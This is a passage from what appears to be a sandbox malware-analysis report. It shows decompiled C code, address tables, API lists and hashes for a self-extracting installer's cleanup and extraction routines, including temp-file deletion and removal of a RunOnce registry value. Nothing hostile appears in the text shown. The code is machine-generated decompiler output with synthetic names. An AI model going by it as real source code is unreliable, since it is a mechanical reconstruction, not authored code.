                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_t31 =  *0x8d91e0; // 0x33c7140
                                                                                                                                                                                                                                            				if(_t31 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t29 = _t31;
                                                                                                                                                                                                                                            						if( *0x8d8a24 == 0 &&  *0x8d9a30 == 0) {
                                                                                                                                                                                                                                            							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                            							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t31 = _t31[1];
                                                                                                                                                                                                                                            						LocalFree( *_t29);
                                                                                                                                                                                                                                            						LocalFree(_t29);
                                                                                                                                                                                                                                            					} while (_t31 != 0);
                                                                                                                                                                                                                                            					_pop(_t28);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 =  *0x8d8a20; // 0x0
                                                                                                                                                                                                                                            				_pop(_t32);
                                                                                                                                                                                                                                            				if(_t11 != 0 &&  *0x8d8a24 == 0 &&  *0x8d9a30 == 0) {
                                                                                                                                                                                                                                            					_push(_t22);
                                                                                                                                                                                                                                            					E008D1781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            					if(( *0x8d9a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                            						E008D65E8( &_v268);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                            					_t22 =  &_v268;
                                                                                                                                                                                                                                            					E008D2390( &_v268);
                                                                                                                                                                                                                                            					_t11 =  *0x8d8a20; // 0x0
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *0x8d9a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                            					_t11 = E008D1FE1(_t22); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *0x8d8a20 =  *0x8d8a20 & 0x00000000;
                                                                                                                                                                                                                                            				return E008D6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x008d52b6
                                                                                                                                                                                                                                            0x008d52b6
                                                                                                                                                                                                                                            0x008d52b6
                                                                                                                                                                                                                                            0x008d52c1
                                                                                                                                                                                                                                            0x008d52c8
                                                                                                                                                                                                                                            0x008d52cb
                                                                                                                                                                                                                                            0x008d52cc
                                                                                                                                                                                                                                            0x008d52d4
                                                                                                                                                                                                                                            0x008d52d6
                                                                                                                                                                                                                                            0x008d52d7
                                                                                                                                                                                                                                            0x008d52de
                                                                                                                                                                                                                                            0x008d52e0
                                                                                                                                                                                                                                            0x008d52f2
                                                                                                                                                                                                                                            0x008d52fa
                                                                                                                                                                                                                                            0x008d52fa
                                                                                                                                                                                                                                            0x008d5302
                                                                                                                                                                                                                                            0x008d5305
                                                                                                                                                                                                                                            0x008d530c
                                                                                                                                                                                                                                            0x008d5312
                                                                                                                                                                                                                                            0x008d5316
                                                                                                                                                                                                                                            0x008d5316
                                                                                                                                                                                                                                            0x008d5317
                                                                                                                                                                                                                                            0x008d531c
                                                                                                                                                                                                                                            0x008d531f
                                                                                                                                                                                                                                            0x008d5333
                                                                                                                                                                                                                                            0x008d5345
                                                                                                                                                                                                                                            0x008d5351
                                                                                                                                                                                                                                            0x008d5359
                                                                                                                                                                                                                                            0x008d5359
                                                                                                                                                                                                                                            0x008d5363
                                                                                                                                                                                                                                            0x008d5369
                                                                                                                                                                                                                                            0x008d536f
                                                                                                                                                                                                                                            0x008d5374
                                                                                                                                                                                                                                            0x008d5374
                                                                                                                                                                                                                                            0x008d5381
                                                                                                                                                                                                                                            0x008d5387
                                                                                                                                                                                                                                            0x008d5387
                                                                                                                                                                                                                                            0x008d538f
                                                                                                                                                                                                                                            0x008d53a0

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(033C7140,00000080,?,00000000), ref: 008D52F2
                                                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(033C7140), ref: 008D52FA
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(033C7140,?,00000000), ref: 008D5305
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(033C7140), ref: 008D530C
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(008D11FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008D5363
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008D5334
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                            • API String ID: 2833751637-305352358
                                                                                                                                                                                                                                            • Opcode ID: 396da8b0fe628d3d2bf51ba477a66b0612c2a6734662903fe8e2cc8c5ed02d23
                                                                                                                                                                                                                                            • Instruction ID: 6405d5de10c7065383af1bf5311fd430f70c17e19b27394ff9b66b951ab8f917
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 396da8b0fe628d3d2bf51ba477a66b0612c2a6734662903fe8e2cc8c5ed02d23
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C121C032912A24DBDB289F68EC09F6977B0FB11754F14035BE886D23A0CFB45C84CB82
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D1FE1(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				if( *0x8d8530 != 0) {
                                                                                                                                                                                                                                            					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                            					if(_t4 == 0) {
                                                                                                                                                                                                                                            						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                                                                                                                                                                                            						return RegCloseKey(_v8);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            0x008d1fee
                                                                                                                                                                                                                                            0x008d2005
                                                                                                                                                                                                                                            0x008d200d
                                                                                                                                                                                                                                            0x008d2017
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2020
                                                                                                                                                                                                                                            0x008d200d
                                                                                                                                                                                                                                            0x008d2029

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,008D538C,?,?,008D538C), ref: 008D2005
                                                                                                                                                                                                                                            • RegDeleteValueA.KERNELBASE(008D538C,wextract_cleanup0,?,?,008D538C), ref: 008D2017
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(008D538C,?,?,008D538C), ref: 008D2020
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                                                            • API String ID: 849931509-702805525
                                                                                                                                                                                                                                            • Opcode ID: 543f20e96a0a3234e444471c74109336c78b5c78a2f617f0bb1460dba0f79d29
                                                                                                                                                                                                                                            • Instruction ID: 0079ce43cac06581a68b13ab01a55cd993a7d96c217ba47e32812fb9902f2754
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 543f20e96a0a3234e444471c74109336c78b5c78a2f617f0bb1460dba0f79d29
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AE04F30551718FBD7258B91EC4AF5D7B39FB10740F200397B904E0260EB715E14D605
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E008D4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				long _t35;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				struct HWND__* _t37;
                                                                                                                                                                                                                                            				long _t38;
                                                                                                                                                                                                                                            				long _t39;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				long _t44;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				long _t46;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				long _t51;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				long _t59;
                                                                                                                                                                                                                                            				char* _t63;
                                                                                                                                                                                                                                            				long _t64;
                                                                                                                                                                                                                                            				CHAR* _t71;
                                                                                                                                                                                                                                            				CHAR* _t74;
                                                                                                                                                                                                                                            				int _t75;
                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                                                            				_v8 = _t30;
                                                                                                                                                                                                                                            				_t75 = _a8;
                                                                                                                                                                                                                                            				if( *0x8d91d8 == 0) {
                                                                                                                                                                                                                                            					_t32 = _a4;
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 == 0) {
                                                                                                                                                                                                                                            						_t33 = E008D4E99(_t75);
                                                                                                                                                                                                                                            						L35:
                                                                                                                                                                                                                                            						return E008D6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t35 = _t32 - 1;
                                                                                                                                                                                                                                            					__eflags = _t35;
                                                                                                                                                                                                                                            					if(_t35 == 0) {
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						_t33 = 0;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t36 = _t35 - 1;
                                                                                                                                                                                                                                            					__eflags = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0) {
                                                                                                                                                                                                                                            						_t37 =  *0x8d8584; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t37;
                                                                                                                                                                                                                                            						if(_t37 != 0) {
                                                                                                                                                                                                                                            							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t54 = 0x8d91e4;
                                                                                                                                                                                                                                            						_t58 = 0x8d91e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t38 =  *_t58;
                                                                                                                                                                                                                                            							_t58 =  &(_t58[1]);
                                                                                                                                                                                                                                            							__eflags = _t38;
                                                                                                                                                                                                                                            						} while (_t38 != 0);
                                                                                                                                                                                                                                            						_t59 = _t58 - 0x8d91e5;
                                                                                                                                                                                                                                            						__eflags = _t59;
                                                                                                                                                                                                                                            						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t73 =  &(_t71[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t39 =  *_t71;
                                                                                                                                                                                                                                            							_t71 =  &(_t71[1]);
                                                                                                                                                                                                                                            							__eflags = _t39;
                                                                                                                                                                                                                                            						} while (_t39 != 0);
                                                                                                                                                                                                                                            						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                            						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							L3:
                                                                                                                                                                                                                                            							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0x8d91e4;
                                                                                                                                                                                                                                            						_t30 = E008D4702( &_v268, 0x8d91e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t41 = E008D476D( &_v268, __eflags);
                                                                                                                                                                                                                                            						__eflags = _t41;
                                                                                                                                                                                                                                            						if(_t41 == 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0x180);
                                                                                                                                                                                                                                            						_t30 = E008D4980( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                            						_t75 = _t30;
                                                                                                                                                                                                                                            						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                            						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = E008D47E0( &_v268);
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x8d93f4 =  *0x8d93f4 + 1;
                                                                                                                                                                                                                                            						_t33 = _t75;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t44 = _t36 - 1;
                                                                                                                                                                                                                                            					__eflags = _t44;
                                                                                                                                                                                                                                            					if(_t44 == 0) {
                                                                                                                                                                                                                                            						_t54 = 0x8d91e4;
                                                                                                                                                                                                                                            						_t63 = 0x8d91e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t45 =  *_t63;
                                                                                                                                                                                                                                            							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                            							__eflags = _t45;
                                                                                                                                                                                                                                            						} while (_t45 != 0);
                                                                                                                                                                                                                                            						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t64 = _t63 - 0x8d91e5;
                                                                                                                                                                                                                                            						__eflags = _t64;
                                                                                                                                                                                                                                            						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t46 =  *_t74;
                                                                                                                                                                                                                                            							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                            							__eflags = _t46;
                                                                                                                                                                                                                                            						} while (_t46 != 0);
                                                                                                                                                                                                                                            						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                            						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0x8d91e4;
                                                                                                                                                                                                                                            						_t30 = E008D4702( &_v268, 0x8d91e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                            						_t30 = E008D4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						E008D4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                            						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                            						__eflags = _t50;
                                                                                                                                                                                                                                            						if(_t50 != 0) {
                                                                                                                                                                                                                                            							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                            							__eflags = _t51;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t51 = 0x80;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t33 = 1;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t30 = _t44 - 1;
                                                                                                                                                                                                                                            					__eflags = _t30;
                                                                                                                                                                                                                                            					if(_t30 == 0) {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a4 == 3) {
                                                                                                                                                                                                                                            					_t30 = E008D4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L3;
                                                                                                                                                                                                                                            			}































                                                                                                                                                                                                                                            0x008d4cd0
                                                                                                                                                                                                                                            0x008d4cdb
                                                                                                                                                                                                                                            0x008d4ce0
                                                                                                                                                                                                                                            0x008d4ce2
                                                                                                                                                                                                                                            0x008d4cee
                                                                                                                                                                                                                                            0x008d4cf2
                                                                                                                                                                                                                                            0x008d4d0e
                                                                                                                                                                                                                                            0x008d4d0e
                                                                                                                                                                                                                                            0x008d4d11
                                                                                                                                                                                                                                            0x008d4e83
                                                                                                                                                                                                                                            0x008d4e88
                                                                                                                                                                                                                                            0x008d4e98
                                                                                                                                                                                                                                            0x008d4e98
                                                                                                                                                                                                                                            0x008d4d17
                                                                                                                                                                                                                                            0x008d4d17
                                                                                                                                                                                                                                            0x008d4d1a
                                                                                                                                                                                                                                            0x008d4d2f
                                                                                                                                                                                                                                            0x008d4d2f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4d2f
                                                                                                                                                                                                                                            0x008d4d1c
                                                                                                                                                                                                                                            0x008d4d1c
                                                                                                                                                                                                                                            0x008d4d1f
                                                                                                                                                                                                                                            0x008d4dcb
                                                                                                                                                                                                                                            0x008d4dd0
                                                                                                                                                                                                                                            0x008d4dd2
                                                                                                                                                                                                                                            0x008d4ddd
                                                                                                                                                                                                                                            0x008d4ddd
                                                                                                                                                                                                                                            0x008d4de3
                                                                                                                                                                                                                                            0x008d4de8
                                                                                                                                                                                                                                            0x008d4ded
                                                                                                                                                                                                                                            0x008d4ded
                                                                                                                                                                                                                                            0x008d4def
                                                                                                                                                                                                                                            0x008d4df0
                                                                                                                                                                                                                                            0x008d4df0
                                                                                                                                                                                                                                            0x008d4df4
                                                                                                                                                                                                                                            0x008d4df4
                                                                                                                                                                                                                                            0x008d4df6
                                                                                                                                                                                                                                            0x008d4df9
                                                                                                                                                                                                                                            0x008d4dfc
                                                                                                                                                                                                                                            0x008d4dfc
                                                                                                                                                                                                                                            0x008d4dfe
                                                                                                                                                                                                                                            0x008d4dff
                                                                                                                                                                                                                                            0x008d4dff
                                                                                                                                                                                                                                            0x008d4e03
                                                                                                                                                                                                                                            0x008d4e08
                                                                                                                                                                                                                                            0x008d4e0a
                                                                                                                                                                                                                                            0x008d4e0f
                                                                                                                                                                                                                                            0x008d4d03
                                                                                                                                                                                                                                            0x008d4d03
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4d03
                                                                                                                                                                                                                                            0x008d4e18
                                                                                                                                                                                                                                            0x008d4e20
                                                                                                                                                                                                                                            0x008d4e25
                                                                                                                                                                                                                                            0x008d4e27
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4e33
                                                                                                                                                                                                                                            0x008d4e38
                                                                                                                                                                                                                                            0x008d4e3a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4e40
                                                                                                                                                                                                                                            0x008d4e51
                                                                                                                                                                                                                                            0x008d4e56
                                                                                                                                                                                                                                            0x008d4e5b
                                                                                                                                                                                                                                            0x008d4e5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4e6a
                                                                                                                                                                                                                                            0x008d4e6f
                                                                                                                                                                                                                                            0x008d4e71
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4e77
                                                                                                                                                                                                                                            0x008d4e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4e7d
                                                                                                                                                                                                                                            0x008d4d25
                                                                                                                                                                                                                                            0x008d4d25
                                                                                                                                                                                                                                            0x008d4d28
                                                                                                                                                                                                                                            0x008d4d36
                                                                                                                                                                                                                                            0x008d4d3b
                                                                                                                                                                                                                                            0x008d4d40
                                                                                                                                                                                                                                            0x008d4d40
                                                                                                                                                                                                                                            0x008d4d42
                                                                                                                                                                                                                                            0x008d4d43
                                                                                                                                                                                                                                            0x008d4d43
                                                                                                                                                                                                                                            0x008d4d47
                                                                                                                                                                                                                                            0x008d4d4a
                                                                                                                                                                                                                                            0x008d4d4a
                                                                                                                                                                                                                                            0x008d4d4c
                                                                                                                                                                                                                                            0x008d4d4f
                                                                                                                                                                                                                                            0x008d4d4f
                                                                                                                                                                                                                                            0x008d4d51
                                                                                                                                                                                                                                            0x008d4d52
                                                                                                                                                                                                                                            0x008d4d52
                                                                                                                                                                                                                                            0x008d4d56
                                                                                                                                                                                                                                            0x008d4d5b
                                                                                                                                                                                                                                            0x008d4d5d
                                                                                                                                                                                                                                            0x008d4d62
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4d67
                                                                                                                                                                                                                                            0x008d4d6f
                                                                                                                                                                                                                                            0x008d4d74
                                                                                                                                                                                                                                            0x008d4d76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4d7c
                                                                                                                                                                                                                                            0x008d4d84
                                                                                                                                                                                                                                            0x008d4d89
                                                                                                                                                                                                                                            0x008d4d8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4d94
                                                                                                                                                                                                                                            0x008d4d99
                                                                                                                                                                                                                                            0x008d4d9e
                                                                                                                                                                                                                                            0x008d4da1
                                                                                                                                                                                                                                            0x008d4daa
                                                                                                                                                                                                                                            0x008d4daa
                                                                                                                                                                                                                                            0x008d4da3
                                                                                                                                                                                                                                            0x008d4da3
                                                                                                                                                                                                                                            0x008d4da3
                                                                                                                                                                                                                                            0x008d4db5
                                                                                                                                                                                                                                            0x008d4dbb
                                                                                                                                                                                                                                            0x008d4dbd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4dc3
                                                                                                                                                                                                                                            0x008d4dc5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4dc5
                                                                                                                                                                                                                                            0x008d4dbd
                                                                                                                                                                                                                                            0x008d4d2a
                                                                                                                                                                                                                                            0x008d4d2a
                                                                                                                                                                                                                                            0x008d4d2d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4d2d
                                                                                                                                                                                                                                            0x008d4cf8
                                                                                                                                                                                                                                            0x008d4cfd
                                                                                                                                                                                                                                            0x008d4d02
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 008D4DB5
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 008D4DDD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFileItemText
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                            • API String ID: 3625706803-305352358
                                                                                                                                                                                                                                            • Opcode ID: 75daaa19929abe0cbec111a6e429343e10f08fff68066c3550f5853ae568fb5c
                                                                                                                                                                                                                                            • Instruction ID: 9a7edde010f04127e343fddc0770135069190f0b1b94c70b07f33c3c8a3fe785
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75daaa19929abe0cbec111a6e429343e10f08fff68066c3550f5853ae568fb5c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 394111362001059BCF359F28DD44AB973A6FB45314F14576BE8C6D7386DA32DE4AC750
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D4C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                            				struct _FILETIME _v12;
                                                                                                                                                                                                                                            				struct _FILETIME _v20;
                                                                                                                                                                                                                                            				FILETIME* _t14;
                                                                                                                                                                                                                                            				int _t15;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t21 + 0x8d8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t14 =  &_v12;
                                                                                                                                                                                                                                            					_t15 = SetFileTime( *(_t21 + 0x8d8d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}








